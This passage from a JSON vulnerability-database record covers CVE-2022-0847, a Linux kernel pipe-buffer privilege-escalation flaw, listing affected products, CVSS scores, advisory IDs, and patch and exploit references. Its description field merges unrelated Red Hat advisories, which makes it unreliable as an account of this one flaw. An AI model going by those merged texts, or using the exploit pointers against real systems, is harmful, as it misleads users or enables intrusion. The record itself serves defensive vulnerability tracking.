                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ovirt:ovirt-engine:4.4.10.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_lpe9403_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_lpe9403:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "12.4.2-02044",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2022-0847",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2022-0847",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2022-0847",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2022-0847",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202203-522",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-0847",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A flaw was found in the way the \"flags\" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. Linux Kernel Has an initialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.4 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic\n\n5. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.8 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity updates:\n\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n\n* nodejs-shelljs: improper privilege management (CVE-2022-0144)\n\n* follow-redirects: Exposure of Private Personal Information to an\nUnauthorized Actor (CVE-2022-0155)\n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\nBug fix:\n\n* RHACM 2.3.8 images (Bugzilla #2062316)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management\n2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2062316 - RHACM 2.3.8 images\n\n5. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel-rt security and bug fix update\nAdvisory ID:       RHSA-2022:0819-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:0819\nIssue date:        2022-03-10\nCVE Names:         CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 \n                   CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 \n                   CVE-2022-22942 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\nRed Hat Enterprise Linux for Real Time (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: improper initialization of the \"flags\" member of the new\npipe_buffer (CVE-2022-0847)\n\n* kernel: Use After Free in unix_gc() which could result in a local\nprivilege escalation (CVE-2021-0920)\n\n* kernel: local privilege escalation by exploiting the fsconfig syscall\nparameter leads to container breakout (CVE-2021-4154)\n\n* kernel: possible privileges escalation due to missing TLB flush\n(CVE-2022-0330)\n\n* kernel: remote stack overflow via kernel panic on systems using TIPC may\nlead to DoS (CVE-2022-0435)\n\n* kernel: cgroups v1 release_agent feature may allow privilege escalation\n(CVE-2022-0492)\n\n* kernel: failing usercopy allows for use-after-free exploitation\n(CVE-2022-22942)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel symbol \u0027__rt_mutex_init\u0027 is exported GPL-only in kernel\n4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)\n\n* kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree\n(BZ#2045589)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation\n2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout\n2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush\n2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation\n2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS\n2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation\n2060795 - CVE-2022-0847 kernel: improper initialization of the \"flags\" member of the new pipe_buffer\n\n6. 
Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nRed Hat Enterprise Linux for Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-0920\nhttps://access.redhat.com/security/cve/CVE-2021-4154\nhttps://access.redhat.com/security/cve/CVE-2022-0330\nhttps://access.redhat.com/security/cve/CVE-2022-0435\nhttps://access.redhat.com/security/cve/CVE-2022-0492\nhttps://access.redhat.com/security/cve/CVE-2022-0847\nhttps://access.redhat.com/security/cve/CVE-2022-22942\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2022-002\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl\nISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k\nord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t\n/AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG\nIODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F\nGbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ\nypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW\nIOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm\nQfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j\nKIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE\nX1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w\nnEhPbkKSmMY=\n=CLN6\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847",
        "trust": 4.0
      },
      {
        "db": "PACKETSTORM",
        "id": "166230",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "166258",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "166229",
        "trust": 2.4
      },
      {
        "db": "SIEMENS",
        "id": "SSA-222547",
        "trust": 1.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-167-09",
        "trust": 1.4
      },
      {
        "db": "PACKETSTORM",
        "id": "176534",
        "trust": 1.0
      },
      {
        "db": "JVN",
        "id": "JVNVU99030761",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "166516",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166280",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166305",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166812",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166241",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166569",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022032843",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031421",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022030808",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022042576",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031308",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031036",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1027",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0965",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.2981",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1677",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1405",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1064",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0944",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2022030042",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2022030060",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50808",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-0847",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166789",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166282",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166281",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166265",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166264",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "id": "VAR-202203-0043",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.21111111
  },
  "last_update_date": "2024-07-23T21:45:03.589000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug\u00a02060795",
        "trust": 0.8,
        "url": "https://fedoraproject.org/"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=184957"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20220822 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20220831 - security advisory"
      },
      {
        "title": "Red Hat: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2022-0847"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2022-0847"
      },
      {
        "title": "Dirty-Pipe-Oneshot",
        "trust": 0.1,
        "url": "https://github.com/badboy-sft/dirty-pipe-oneshot "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
